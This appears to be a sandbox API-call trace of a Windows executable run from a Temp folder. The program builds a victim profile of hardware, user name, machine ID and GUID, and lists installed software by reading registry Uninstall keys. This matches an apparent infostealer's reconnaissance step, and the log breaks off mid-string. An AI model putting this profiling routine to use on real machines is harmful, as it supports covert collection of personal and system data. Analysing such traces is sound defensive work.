3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 " [0175.884] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001" [0175.884] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\n" [0175.884] RegCloseKey (hKey=0x354) returned 0x0 [0175.884] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x1e, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0015-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.884] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0015-0409-0000-0000000FF1CE}") returned 90 [0175.884] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0015-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.884] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Access MUI (English) 2016", lpcbData=0x197fd4*=0x24) returned 0x0 [0175.885] lstrlenA (lpString="Microsoft Access MUI (English) 2016") returned 35 [0175.885] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\n", lpString2="Microsoft Access MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016" [0175.885] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.885] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 " [0175.885] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001" [0175.885] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual 